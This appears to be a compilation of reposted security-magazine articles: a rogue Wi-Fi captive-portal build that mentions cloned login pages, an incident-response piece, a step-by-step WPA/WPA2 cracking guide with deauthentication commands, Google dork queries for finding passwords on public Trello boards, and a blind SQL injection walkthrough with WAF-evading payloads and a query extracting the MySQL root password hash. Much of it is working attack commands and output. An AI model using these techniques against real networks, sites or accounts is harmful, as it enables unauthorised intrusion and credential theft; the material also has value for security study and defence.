You do it. I do it. Everyone does it without thinking.

You connect your phone to that “Free Public Wi-Fi” at the airport or coffee shop without a second glance, even if your phone warns you that it’s an “unsecure” network. Sometimes you are faced with a captive portal: one of those annoying pop-ups that asks you to sign in or accept the Terms & Conditions before you can connect.

With just a few pieces of equipment, you can make your own “Free Public Wi-Fi” (or whatever you want to name it) with any page you could imagine as your captive portal.

Hopefully, after seeing how easy it is to get this set up, you will be more cautious before entering credentials or personal data into a Wi-Fi network’s captive portal.

Equipment

Here’s the equipment I am using for this bad boy:

• Raspberry Pi Zero with an image of Raspbian OS

• ALFA AWUS036NEH Long Range 802.11b/g/n Wi-Fi USB Adapter

• USB Hub to increase range of the Wi-Fi dongle (so that it doesn’t rely on the 5V supply directly from the Pi)

Creating a Hotspot

1. hostapd (Host Access Point Daemon)

On your Raspberry Pi, install hostapd and configure /etc/hostapd/hostapd.conf like so:

interface=wlan1
ssid=YOUR_NETWORK_NAME_HERE
hw_mode=g
channel=11
macaddr_acl=0

Enable hostapd every time the Pi boots:

$ sudo systemctl enable hostapd

Then set DAEMON_CONF="/etc/hostapd/hostapd.conf" in the file /etc/default/hostapd.

• hostapd will start every time the Pi boots

• It will try to use the interface wlan1. This is the interface your Wi-Fi dongle is using. For me, it’s wlan1.

• Hardware mode g refers to IEEE 802.11g (2.4 GHz).

• channel=11 is somewhat arbitrary. There are 14 channels in the 2.4 GHz band.

• macaddr_acl=0 means the Access Control List will accept everything unless it’s specifically in the deny list.

2. DHCP Server (Dynamic Host Configuration Protocol)

Install isc‐dhcp‐server and edit the file /etc/dhcp/dhcpd.conf. Uncomment the line:

# autoritative

Now add this to the end of the file:

This means that clients who connect to the network will receive IP addresses between 10.0.10.2-254. The router (Raspberry Pi) IP address is 10.0.10.1. The first 24 bits of the IP address are part of the network portion of the address, leaving the remaining 8 out of 32 bits for hosts on the hotspot. The IP addresses 8.8.8.9 and 8.8.4.4 are simply Google’s DNS servers.

3. Configure network interfaces

Modify the file /etc/network/interfaces for wlan1.

Note that auto INTERFACE means to start the interface on boot. Next, uncomment

in the file /etc/sysctl.conf.

4. Configure iptables

Run the command

$ sudo iptables ‐t nat ‐A POSTROUTING ‐o wlan0 ‐j MASQUERADE

• -t nat → use the NAT table (Network Address Translation)
• -A POSTROUTING → (or --append) alter packets as they are about to go out

• -o wlan0 → (or --out-interface) chained with -A option to specify the interface via which a packet is going to be sent (use the Raspberry Pi’s main, normal interface which should have an Internet connection via another network)

• ‐j MASQUERADE → allows routing traffic without disrupting the original traffic

Then persist iptables simply by running the command

$ sudo apt‐get install iptables‐persistent

If you need to re-save the iptables configuration, do it like this:

5. Save and reboot

$ sudo shutdown -r now

Creating a Captive Portal

1. nodogsplash

For this, we’re going to use the open source project nodogsplash. Its documentation states that it is “a Captive Portal that offers a simple way to provide restricted access to the Internet by showing a splash page to the user before Internet access is granted.”

I used version 3.0, so I can’t guarantee that this will work if you use another version. After cloning the Git repo, run git checkout v3.0.0 to checkout the same version.

Edit the file /etc/nodogsplash/nodogsplash.conf with the contents from this Gist. To understand all of the settings, I recommend reading the documentation. But in brief:

• It will use interface wlan1, the interface that the Wi-Fi dongle is using.

• It’s important to allow pre-authenticated users to have access to port 53 in order for their device to resolve DNS (*more on that below).

• We are also using Forwarding Authentication Service (FAS) listening on port 8000, for reasons described below.

Why do pre-authenticated users need to have access to port 53? When a computer or mobile device connects to a Wi-Fi network, there is often a built-in mechanism to detect a captive portal and launch a native browser to accept Terms & Conditions. For example, an iPhone launches a request to http://captive.apple.com and checks if the response is “Success.” If it is not“Success” then the phone knows it needs to go through a captive portal. Without port 53, the device is unable to resolve DNS and get a response on whether it has a successful connection or not.

2. FAS

FAS is the meat of the captive portal. Here is where you craft your special website or webpage that the user must go through before receiving Internet access. It can be anything: an image of hairy monkeys eating grapes, a Terms & Conditions page, or something more malicious like a login page which looks identical to that of a popular website. This can be especially devious if you give the Wi-Fi hotspot a name relevant to the popular website you are emulating. And not legal, so don’t do it! And don’t put credentials into a public Wi-Fi captive portal!

Not only can the webpage look like anything, you can also make it with pretty much anything that will run on the Raspberry Pi (which is now acting as a server). That means HTML+CSS+Javascript, Angular, Ruby on Rails, node.js, etc. For this example, I chose Python-Flask.

The Python server is configured to listen on port 8000, because this is the port we specified in the nodogsplash configuration. When a user enters the captive portal, he will be served the index (/) page of the Python-Flask server. nodogsplash will send ?tok=XXX&redir=YYY to the index page, via optional parameters in the URL. After you’ve done… whatever it is you wanted to do… the user should be redirected to http://<nodogsplashIP:nodogsplashPORT>/nodogsplash_auth/?tok=tok&redir=redir where the values of tok and redir are the same as those passed in the initial URL. After nodogsplash receives this GET request, it understands that the user has been granted Internet access.

nodogsplashIP should be the IP address of the router (the Pi) and if you are using my configuration file, nodogsplashPORT should be 2050.

Tips for doing this on the Raspberry Pi

Commands

• lsusb → show attached USB devices

• lsmod → show loaded kernel modules and generally useful system information

• dmesg → show system messages

• lshw → show hardware information

• wpa_cli → initiate a command-line tool to setup/scan Wi-Fi networks (especially useful if you are connecting to the Pi via SSH)

Random stuff

You can add commands in /etc/rc.local to run them at boot. Be warned that if one command fails, the script will exit, so the subsequent commands will not execute.

Place an empty file named ssh in the boot partition of your SD card, to auto-enable SSH (note that it is important to have dtoverlay=dwc2 in the config.txt file).

You can also make a file named wpa_supplicant.conf in the boot partition of your SD card to automatically connect to a network. An example is below:

Originally posted at: https://medium.com/bugbountywriteup/how-to-make-a-captive-portal-of-death-48e82a1d81a

The post How to Make a Captive Portal of Death by Trevor Phillips appeared first on Hakin9 - IT Security Magazine.

There are two common approaches to incident response: qualitative and quantitative. Each approach has its pros and cons. Meanwhile, an enterprise’s decision to take a qualitative or quantitative approach to incident response could have far-flung effects on the business, its employees and its customers.

So which is better: a qualitative or quantitative approach to incident response? To answer this question, let’s take a closer look at each incident response approach.

Qualitative Approach to Incident Response

As the name indicates, a “qualitative” approach to incident response relies on data quality. It requires an enterprise to perform interviews, collect questionnaires and conduct other research to understand the qualities or characteristics of its incident response efforts.

For example, let’s consider how an enterprise that takes a qualitative approach to incident response would handle a network outage.

A network outage likely will affect an enterprise and its key stakeholders. Furthermore, failure to quickly address this issue may lead to revenue losses and brand reputation damage.

During a network outage, an incident response team will work diligently to correct the issue. Once the issue is resolved, it will notify key stakeholders accordingly.

At this point, an incident response team can still learn from the network outage. If this team takes a qualitative approach to incident response, it may use surveys to collect feedback from key stakeholders.

A typical qualitative survey may include a series of open-ended questions to gauge a stakeholder’s emotional response to an incident. It allows incident response team members to review stakeholder feedback and use it to improve their day-to-day efforts.

Stakeholder feedback empowers an incident response team with meaningful insights. At the same time, team members may need to dedicate significant time and resources to evaluate stakeholder feedback so they can maximize its value.

Quantitative Approach to Incident Response

Like a qualitative approach to incident response, a quantitative approach may involve the use of questionnaires or surveys. Conversely, a quantitative evaluation helps an incident response team answer questions like, “What was the root cause of an incident?” or “How many people were affected by an incident?”

For instance, after a network outage, an incident response team that takes a quantitative approach may use a survey that contains closed-ended questions. Each question may require a “yes” or “no” response or ask a stakeholder to rate the team’s incident response efforts on a scale of 1 (lowest score) to 5 (highest score). An incident response team then can use the survey results to identify improvement areas.

Performing a quantitative survey usually is straightforward. An incident response team can craft survey questions, provide the survey to stakeholders following an incident and evaluate the survey responses at its convenience.

On the other hand, every incident is different, and the numbers behind an incident won’t necessarily tell the full story. Even with quantitative stakeholder survey results at its disposal, there is no guarantee an incident response team can obtain actionable insights that it can use to drive meaningful improvements.

Should You Take a Qualitative or Quantitative Approach to Incident Response?

By using a combination of qualitative and quantitative evaluations, an incident response team can get the most out of its incident data.

For example, consider what would happen if an enterprise used qualitative and quantitative assessments to evaluate its incident response efforts related to a network outage.

A stakeholder survey that includes both open- and closed-ended questions empowers an incident response team with a wealth of meaningful data. The team can use this survey to understand the “how” and “what” behind its response efforts. Plus, it can find out how stakeholders feel about these efforts.

Thanks to qualitative and quantitative assessments, an enterprise can ensure all incident response team members are on the same page, too.

Qualitative and quantitative assessments enable incident response team members to mine massive amounts of incident data and identify the team’s strengths and weaknesses. Next, the assessments can help the team discover innovative ways to transform its weaknesses into strengths.

Of course, a hybrid approach to incident response can extend beyond stakeholder evaluations as well.

If an enterprise deploys an effective incident management system, it can retrieve data throughout an incident. It can even leverage data-driven reports and analytics that highlight incident response patterns and trends — something that could lead to long-lasting incident response improvements.

Let’s not forget about how an enterprise can use an alert tracking system to streamline its incident communications, either.

An enterprise may be responsible for notifying thousands of employees, customers and other stakeholders about an incident. Yet ensuring the right parties get the right messages at the right time is rarely simple.

Now, an alert monitoring system helps an enterprise get the right messages to the right people during an incident. It also empowers an incident response team to craft custom messages to its target audience. As a result, the system allows an incident response team to simultaneously retrieve data and keep stakeholders up to date until an incident is resolved.

The Bottom Line on Qualitative and Quantitative Approaches to Incident Response

When it comes to incident response, qualitative and quantitative approaches offer various advantages and disadvantages. With a hybrid approach to incident response, an enterprise is better equipped than ever before to simplify and enhance its incident response efforts.

An alert tracking system that offers rich notifications and reporting can provide the foundation of a hybrid approach to incident response. The system helps an incident response team notify key stakeholders about an incident, track incident data, produce incident reports and much more. Thus, an alert monitoring system can help an incident response team establish goals and drive continuous improvement.

AlertOps is a collaborative Incident Management, DevOps, and IT Alerting platform that helps organizations reduce MTTR.

Source:https://medium.com/@AlertOps/incident-response-should-you-prioritize-quality-or-quantity-125786533cb 

The post Incident Response: Should You Prioritise Quality or Quantity? by AlertOps appeared first on Hakin9 - IT Security Magazine.

This is a brief walk-through tutorial that illustrates how to crack Wi-Fi networks that are secured using weak passwords. It is not exhaustive, but it should be enough information for you to test your own network’s security or break into one nearby. The attack outlined below is entirely passive (listening only, nothing is broadcast from your computer) and it is impossible to detect provided that you don’t actually use the password that you crack. An optional active deauthentication attack can be used to speed up the reconnaissance process and is described at the end of this document.

If you are familiar with this process, you can skip the descriptions and jump to a list of the commands used at the bottom. This tutorial is also posted on GitHub. Read it there for the most up-t0-date version and BASH syntax highlighting.

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use.  

Getting Started

This tutorial assumes that you:

• Have a general comfortability using the command-line
• Are running a debian-based linux distro (preferably Kali linux)
• Have Aircrack-ng installed (sudo apt-get install aircrack-ng)
• Have a wireless card that supports monitor mode (I recommend this one. See here for more info.)

Cracking a Wi-Fi Network

Monitor Mode

Begin by listing wireless interfaces that support monitor mode with:

airmon-ng

If you do not see an interface listed then your wireless card does not support monitor mode

We will assume your wireless interface name is wlan0 but be sure to use the correct name if it differs from this. Next, we will place the interface into monitor mode:

airmon-ng start wlan0

Run iwconfig. You should now see a new monitor mode interface listed (likely mon0 or wlan0mon).

Find Your Target

Start listening to 802.11 Beacon frames broadcast by nearby wireless routers using your monitor interface:

airodump-ng mon0

You should see output similar to what is below.

CH 13 ][ Elapsed: 52 s ][ 2017–07–23 15:49 


BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 


14:91:82:F7:52:EB -66 205 26 0 1 54e OPN belkin.2e8.guests 

14:91:82:F7:52:E8 -64 212 56 0 1 54e WPA2 CCMP PSK belkin.2e8 

14:22:DB:1A:DB:64 -81 44 7 0 1 54 WPA2 CCMP <length: 0> 

14:22:DB:1A:DB:66 -83 48 0 0 1 54e. WPA2 CCMP PSK steveserro 

9C:5C:8E:C9:AB:C0 -81 19 0 0 3 54e WPA2 CCMP PSK hackme 

00:23:69:AD:AF:94 -82 350 4 0 1 54e WPA2 CCMP PSK Kaitlin’s Awesome 

06:26:BB:75:ED:69 -84 232 0 0 1 54e. WPA2 CCMP PSK HH2 

78:71:9C:99:67:D0 -82 339 0 0 1 54e. WPA2 CCMP PSK ARRIS-67D2 

9C:34:26:9F:2E:E8 -85 40 0 0 1 54e. WPA2 CCMP PSK Comcast_2EEA-EXT 

BC:EE:7B:8F:48:28 -85 119 10 0 1 54e WPA2 CCMP PSK root 

EC:1A:59:36:AD:CA -86 210 28 0 1 54e WPA2 CCMP PSK belkin.dca

For the purposes of this demo, we will choose to crack the password of my network, “hackme”. Remember the BSSID MAC address and channel (CH) number as displayed by airodump-ng, as we will need them both for the next step.

Capture a 4-way Handshake

WPA/WPA2 uses a 4-way handshake to authenticate devices to the network. You don’t have to know anything about what that means, but you do have to capture one of these handshakes in order to crack the network password. These handshakes occur whenever a device connects to the network, for instance, when your neighbor returns home from work. We capture this handshake by directing airmon-ng to monitor traffic on the target network using the channel and bssid values discovered from the previous command.

# replace -c and — bssid values with the values of your target network
# -w specifies the directory where we will save the packet capture
airodump-ng -c 3 — bssid 9C:5C:8E:C9:AB:C0 -w . mon0

CH 6 ][ Elapsed: 1 min ][ 2017–07–23 16:09 ]  

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 

9C:5C:8E:C9:AB:C0 -47 0 140 0 0 6 54e WPA2 CCMP PSK ASUS

Now we wait… Once you’ve captured a handshake, you should see something like [ WPA handshake: bc:d3:c9:ef:d2:67 at the top right of the screen, just right of the current time.

If you are feeling impatient, and are comfortable using an active attack, you can force devices connected to the target network to reconnect, be sending malicious deauthentication packets at them. This often results in the capture of a 4-way handshake. See the deauth attack section below for info on this.

Once you’ve captured a handshake, press ctrl-c to quit airodump-ng. You should see a .cap file wherever you told airodump-ng to save the capture (likely called -01.cap). We will use this capture file to crack the network password. I like to rename this file to reflect the network name we are trying to crack:

mv ./-01.cap hackme.cap

Crack the Network Password

The final step is to crack the password using the captured handshake. If you have access to a GPU, I highly recommend using hashcat for password cracking. I’ve created a simple tool that makes hashcat super easy to use called naive-hashcat. If you don’t have access to a GPU, there are various online GPU cracking services that you can use, like GPUHASH.me or OnlineHashCrack. You can also try your hand at CPU cracking with Aircrack-ng.

Note that both attack methods below assume a relatively weak user generated password. Most WPA/WPA2 routers come with strong 12 character random passwords that many users (rightly) leave unchanged. If you are attempting to crack one of these passwords, I recommend using the Probable-Wordlists WPA-length dictionary files.

Cracking With naive-hashcat (recommended)

Before we can crack the password using naive-hashcat, we need to convert our .cap file to the equivalent hashcat file format .hccapx. You can do this easily by either uploading the .cap file to https://hashcat.net/cap2hccapx/or using the cap2hccapx tool directly.

cap2hccapx.bin hackme.cap hackme.hccapx

Next, download and run naive-hashcat:

# downloadgit clone https://github.com/brannondorsey/naive-hashcat
cd naive-hashcat

# download the 134MB rockyou dictionary file
curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

# crack ! baby ! crack !
# 2500 is the hashcat hash mode for WPA/WPA2
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh

Naive-hashcat uses various dictionary, rule, combination, and mask (smart brute-force) attacks and it can take days or even months to run against mid-strength passwords. The cracked password will be saved to hackme.pot, so check this file periodically. Once you’ve cracked the password, you should see something like this as the contents of your POT_FILE:

e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:hacktheplanet

Where the last two fields separated by : are the network name and password respectively.

If you would like to use hashcat without naive-hashcat see this page for info.

Cracking With Aircrack-ng

Aircrack-ng can be used for very basic dictionary attacks running on your CPU. Before you run the attack you need a wordlist. I recommend using the infamous rockyou dictionary file:

# download the 134MB rockyou dictionary file
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

Note, that if the network password is not in the wordlist you will not crack the password.

# -a2 specifies WPA2, -b is the BSSID, -w is the wordfile
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt hackme.cap

If the password is cracked you will see a KEY FOUND! message in the terminal followed by the plain text version of the network password.

Aircrack-ng 1.2 beta3

[00:01:49] 111040 keys tested (1017.96 k/s)

KEY FOUND! [ hacktheplanet ]

Master Key : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89  
 59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E

Transient Key : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71  
 2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73  
 6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78  
 8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21

EAPOL HMAC : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4

Deauth Attack

A deauth attack sends forged deauthentication packets from your machine to a client connected to the network you are trying to crack. These packets include fake “sender” addresses that make them appear to the client as if they were sent from the access point themselves. Upon receipt of such packets, most clients disconnect from the network and immediately reconnect, providing you with a 4-way handshake if you are listening with airodump-ng.

Use airodump-ng to monitor a specific access point (using -c channel --bssid MAC) until you see a client (STATION) connected. A connected client look something like this, where is 64:BC:0C:48:97:F7 the client MAC.

CH 6 ][ Elapsed: 2 mins ][ 2017–07–23 19:15 ]  

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 

9C:5C:8E:C9:AB:C0 -19 75 1043 144 10 6 54e WPA2 CCMP PSK ASUS  

BSSID STATION PWR Rate Lost Frames Probe  

9C:5C:8E:C9:AB:C0 64:BC:0C:48:97:F7 -37 1e- 1e 4 6479 ASUS

Now, leave airodump-ng running and open a new terminal. We will use the aireplay-ng command to send fake deauth packets to our victim client, forcing it to reconnect to the network and hopefully grabbing a handshake in the process.

# -0 2 specifies we would like to send 2 deauth packets. Increase this number
# if need be with the risk of noticably interrupting client network activity
# -a is the MAC of the access point
# -c is the MAC of the client
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0

You can optionally broadcast deauth packets to all connected clients with:

# not all clients respect broadcast deauths though
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 mon0

Once you’ve sent the deauth packets, head back over to your airodump-ngprocess, and with any luck you should now see something like this at the top right: [ WPA handshake: 9C:5C:8E:C9:AB:C0. Now that you’ve captured a handshake you should be ready to crack the network password.

List of Commands

Below is a list of all of the commands needed to crack a WPA/WPA2 network, in order, with minimal explanation.

# put your network device into monitor mode
airmon-ng start wlan0

# listen for all nearby beacon frames to get target BSSID and channel
airodump-ng mon0

# start listening for the handshake
airodump-ng -c 6 — bssid 9C:5C:8E:C9:AB:C0 -w capture/ mon0

# optionally deauth a connected client to force a handshake
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0

########## crack password with aircrack-ng… ########### 

download 134MB rockyou.txt dictionary file if needed
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

# crack w/ aircrack-ng
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt capture/-01.cap

########## or crack password with naive-hashcat ##########

#  convert cap to hccapxcap2hc
capx.bin capture/-01.cap capture/-01.hccapx

# crack with naive-hashcat
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh

Attribution

Much of the information presented here was gleaned from Lewis Encarnacion’s awesome tutorial. Thanks also to the awesome authors and maintainers who work on Aircrack-ng and Hashcat.

Shout out to DrinkMoreCodeMore, hivie7510, cprogrammer1994, hartzell, flennic, bhusang, tversteeg, gpetrousov, crowchirp and Shark0der who also provided suggestions and typo fixes on Reddit and GitHub. If you are interested in hearing some proposed alternatives to WPA2, check out some of the great discussion on this Hacker News post.

Originally posted: https://medium.com/@brannondorsey/crack-wpa-wpa2-wi-fi-routers-with-aircrack-ng-and-hashcat-a5a5d3ffea46

The post Crack WPA/WPA2 Wi-Fi Routers with Aircrack-ng and Hashcat by Brannon Dorsey appeared first on Hakin9 - IT Security Magazine.

A few days ago on 25th April, while researching, I found that a lot of individuals and companies are putting their sensitive information on their public Trello boards. Information like unfixed bugs and security vulnerabilities, the credentials of their social media accounts, email accounts, server and admin dashboards — you name it, is available on their public Trello Boards which are being indexed by all the search engines and anyone can easily find them.

How did I discover this?

I searched for Jira instances of companies running Bug Bounty Programs with the following search query:

inurl:jira AND intitle:login AND inurl:[company_name]

Note: I used a Google dork query, sometimes referred to as a dork. It is a search string that uses advanced search operators to find information that is not readily available on a website. — WhatIs.com

I entered Trello in place of [company name]. Google presented a few results on Trello Boards. Their visibility was set to Public, and they displayed login details to some Jira instances. It was around 8:19 AM, UTC.

I was so shocked and amazed

So why was this a problem? Well, Trello is an online tool for managing projects and personal tasks. And it has Boards which are used to manage those projects and tasks. The user can set the visibility of their boards to Private or Public.

After finding this flaw, I thought — why not check for other security issues like email account credentials?

I went on to modify my search query to focus on Trello Boards containing the passwords for Gmail accounts.

inurl:https://trello.com AND intext:@gmail.com AND intext:password

And what about SSH and FTP?

inurl:https://trello.com AND intext:ftp AND intext:password

inurl:https://trello.com AND intext:ssh AND intext:password

What else I found

After spending a few hours using this technique, I uncovered more amazing discoveries. All while I kept on changing my search query.

Some companies use Public Trello boards to manage bugs and security vulnerabilities found in their applications and websites.

People also use Public Trello boards as a fancy public password manager for their organization’s credentials.

Some examples included the server, CMS, CRM, business emails, social media accounts, website analytics, Stripe, AdWords accounts, and much more.

Examples of public Trello boards which contain sensitive credentials

inurl:https://trello.com AND intext:[company_name]

The post How I used a simple Google query to mine passwords from dozens of public Trello boards by Kushagra Pathak appeared first on Hakin9 - IT Security Magazine.

tom@bash:~ cat payload.json 
{
    "jsonrpc": "2.0",
    "method": "getWidgets",
    "params": ["2'"]
}
tom@bash:~ curl -s $APIURL -d @payload.json
// ERRORS! ERRORS EVERYWHERE!

tom@bash:~ cat payload.json 
{
    "jsonrpc": "2.0",
    "method": "getWidgets",
    "params": ["2/*'*/"]
}
tom@bash:~ curl -s $APIURL -d @payload.json
// No errors; just results :)

tom@bash:~ cat payload.json
{
    "jsonrpc": "2.0",
    "method": "getWidgets",
    "params": ["2"]
}
tom@bash:~ curl -s $APIURL -d @payload.json | gron | grep type_id
json.result.data.widget[5].assets[0].type_id = 2;
json.result.data.widget[5].assets[1].type_id = 2;
json.result.data.widget[5].assets[2].type_id = 2;

tom@bash:~ cat payload.json 
{
    "jsonrpc": "2.0",
    "method": "getWidgets",
    "params": ["1,2,3,4,5,6,7,8,9,10"]
}
tom@bash:~ curl -s $APIURL -d @payload.json | gron | grep type_id
json.result.data.widget[0].assets[0].type_id = 10;
json.result.data.widget[0].assets[1].type_id = 8;
json.result.data.widget[0].assets[2].type_id = 9;
json.result.data.widget[1].assets[0].type_id = 10;
json.result.data.widget[1].assets[1].type_id = 8;
json.result.data.widget[1].assets[2].type_id = 9;
json.result.data.widget[2].assets[0].type_id = 8;
json.result.data.widget[2].assets[1].type_id = 10;
json.result.data.widget[3].assets[0].type_id = 8;
json.result.data.widget[3].assets[1].type_id = 9;
json.result.data.widget[3].assets[2].type_id = 10;
json.result.data.widget[4].assets[0].type_id = 8;
json.result.data.widget[4].assets[1].type_id = 9;
json.result.data.widget[4].assets[2].type_id = 10;
json.result.data.widget[5].assets[0].type_id = 10;
json.result.data.widget[5].assets[1].type_id = 8;
json.result.data.widget[5].assets[2].type_id = 9;
json.result.data.widget[5].assets[3].type_id = 2;
json.result.data.widget[5].assets[4].type_id = 2;
json.result.data.widget[5].assets[5].type_id = 2;

SELECT
    w.id,
    w.name,
    a.type_id
FROM widgets w
LEFT JOIN assets a ON (
    a.widget_id = w.id
    AND a.type_id IN ($IDS)
)
...more SQL...

mysql> SELECT @@hostname;
+------------+
| @@hostname |
+------------+
| girru      |
+------------+
1 row in set (0.00 sec)

mysql> SELECT IF(SUBSTRING(@@hostname, 1, 1) = "a", 2, 1);
+---------------------------------------------+
| IF(SUBSTRING(@@hostname, 1, 1) = "a", 2, 1) |
+---------------------------------------------+
|                                           1 |
+---------------------------------------------+
1 row in set (0.00 sec)

mysql> SELECT IF(SUBSTRING(@@hostname, 1, 1) = "b", 2, 1);
+---------------------------------------------+
| IF(SUBSTRING(@@hostname, 1, 1) = "b", 2, 1) |
+---------------------------------------------+
|                                           1 |
+---------------------------------------------+
1 row in set (0.00 sec)

mysql> SELECT IF(SUBSTRING(@@hostname, 1, 1) = "g", 2, 1);
+----------------------------------------------+
| IF (SUBSTRING(@@hostname, 1, 1) = "g", 2, 1) |
+----------------------------------------------+
|                                            2 |
+----------------------------------------------+
1 row in set (0.00 sec)

tom@bash:~ cat payload.json
{
    "jsonrpc": "2.0",
    "method": "getWidgets",
    "params": [
        "SELECT IF(SUBSTRING(@@hostname, 1, 1) = \"a\", 2, 1)"
    ]
}
tom@bash:~ curl -s $APIURL -d @payload.json 
<HTML><HEAD>
<TITLE>Access Denied</TITLE>
</HEAD><BODY>
<H1>Access Denied</H1>
 
You don't have permission to access "<redacted>" on this server.<P>
Reference&#32;<redacted>
</BODY>
</HTML>

tom@bash:~ cat payload.json 
{
    "jsonrpc": "2.0",
    "method": "getWidgets",
    "params": [
        "\u0053ELECT \u0049F(\u0053UBSTRING(@@hostname, 1, 1) = \"a\", 2, 1)"
    ]
}
tom@bash:~ curl -s $APIURL -d @payload.json | gron | grep type_id
// No WAF error here; but no assets either!

tom@bash:~ cat payload.json
{
    "jsonrpc": "2.0",
    "method": "getWidgets",
    "params": [
        "\u0053ELECT \u0049F(\u0053UBSTRING(@@hostname, 1, 1) = \"r\", 2, 1)"
    ]
}
tom@bash:~ curl -s $APIURL -d @payload.json | gron | grep type_id
json.result.data.widget[5].assets[0].type_id = 2;
json.result.data.widget[5].assets[1].type_id = 2;
json.result.data.widget[5].assets[2].type_id = 2;

mysql> SELECT CASE SUBSTRING(@@hostname, 1, 1)
    ->     WHEN "a" THEN 1
    ->     WHEN "b" THEN 2
    ->     WHEN "c" THEN 3
    ->     WHEN "d" THEN 4
    ->     WHEN "e" THEN 5
    ->     WHEN "f" THEN 6
    ->     WHEN "g" THEN 7
    ->     ...
    ->     WHEN "z" THEN 26
    -> END as result;
+--------+
| result |
+--------+
|      7 |
+--------+
1 row in set (0.00 sec)

tom@bash:~ cat genrange.php 
<?php
$payload = [
    "jsonrpc" => "2.0",
    "method"  => "getWidgets",
    "params"  => [
        implode(",", range(1, 100))
    ]
];

echo json_encode($payload);
tom@bash:~ curl --compressed -s $APIURL -d @<(php genrange.php) | gron | grep type_id | awk '{print $NF}' | sort -nu
2;
9;
10;
11;
...snip...
37;
38;
39;
40;

tom@bash:~ cat gensql.php 
<?php
// first argument to the script is the char to fetch
$char = $argv[1]?? 1;

// The payload
$sql = '
    SELECT CASE SUBSTRING(@@hostname, '.$char.', 1)
        WHEN "a" THEN 2
        WHEN "b" THEN 8
        WHEN "c" THEN 9
        WHEN "d" THEN 10
...snip...
        WHEN "z" THEN 35
        WHEN "0" THEN 36
        WHEN "1" THEN 37
        WHEN "2" THEN 38
        WHEN "3" THEN 39
        WHEN "4" THEN 40
    END
';

$wrapper = [
    "jsonrpc" => "2.0",
    "method" => "getWidgets",
    "params" => [$sql]
];

$payload = json_encode($wrapper);

// Add some obfuscation to defeat the WAF :)
echo str_replace(
    ["C",      "S",      "T",      "W"],
    ["\u0043", "\u0053", "\u0054", "\u0057"],
    $payload
);

tom@bash:~ curl -s $APIURL -d @<(php gensql.php 1) | gron | grep type_id | awk '{print $NF}' | uniq
27;

tom@bash:~ curl -s $APIURL -d @<(php gensql.php 2) | gron | grep type_id | awk '{print $NF}' | uniq
11;
tom@bash:~ curl -s $APIURL -d @<(php gensql.php 3) | gron | grep type_id | awk '{print $NF}' | uniq
10;
tom@bash:~ curl -s $APIURL -d @<(php gensql.php 4) | gron | grep type_id | awk '{print $NF}' | uniq
2;

tom@bash:~ curl -s $APIURL -d @<(php gensql.php 5) | gron | grep type_id | awk '{print $NF}' | uniq
9;
tom@bash:~ curl -s $APIURL -d @<(php gensql.php 6) | gron | grep type_id | awk '{print $NF}' | uniq
29;
tom@bash:~ curl -s $APIURL -d @<(php gensql.php 7) | gron | grep type_id | awk '{print $NF}' | uniq
11;
tom@bash:~ curl -s $APIURL -d @<(php gensql.php 8) | gron | grep type_id | awk '{print $NF}' | uniq
10;

SELECT CASE SUBSTRING((
    SELECT u.authentication_string
    FROM mysql.user u
    WHERE u.User = "root"
), 1, 1)
    WHEN "*" THEN 2
    WHEN "0" THEN 8
    WHEN "1" THEN 9
...snip...
    WHEN "E" THEN 22
    WHEN "F" THEN 23
END

The post Making a Blind SQL Injection a Little Less Blind by TomNomNom appeared first on Hakin9 - IT Security Magazine.

Are you tired of reading endless news stories about ethical hacking and not really knowing what that means? Let’s change that!

This post is for the people that:

• Have No Experience With Cybersecurity (Hacking)
• Have Limited Experience.
• Those That Just Can’t Get A Break

OK, let’s dive into the post and suggest some ways that you can get ahead in cybersecurity.

I receive many emails on how to become a hacker. “I’m a beginner in hacking, how should I start?” or “I want to be able to hack my friend’s Facebook account” are some of the more frequent queries. In this article I will attempt to answer these and more. I will give detailed technical instructions on how to get started as a beginner and how to evolve as you gain more knowledge and expertise in the domain. Hacking is a skill. And you must remember that if you want to learn hacking solely for the fun of hacking into your friend’s Facebook account or email, things will not work out for you. You should decide to learn hacking because of your fascination for technology and your desire to be an expert in computer systems. It’s time to change the color of your hat

I’ve had my good share of Hats. Black, white or sometimes a blackish shade of grey. The darker it gets, the more fun you have. -MakMan

Introduction!

First off, let’s just agree that saying ‘a career in cybersecurity’ is a bit like saying ‘a career in banking’, i.e. it’s an umbrella term that incorporates dozens of niches within the industry. In cybersecurity we can, for example, talk about digital forensics as a career, or malware/ software detecting, auditing, pentesting, social engineering and many other career tracks. Each of these sub-categories within cybersecurity deserves a separate blog post, but, for the purposes of this piece, let’s focus on some important generic requirements that everyone needs before embarking on a successful career in IT Security.

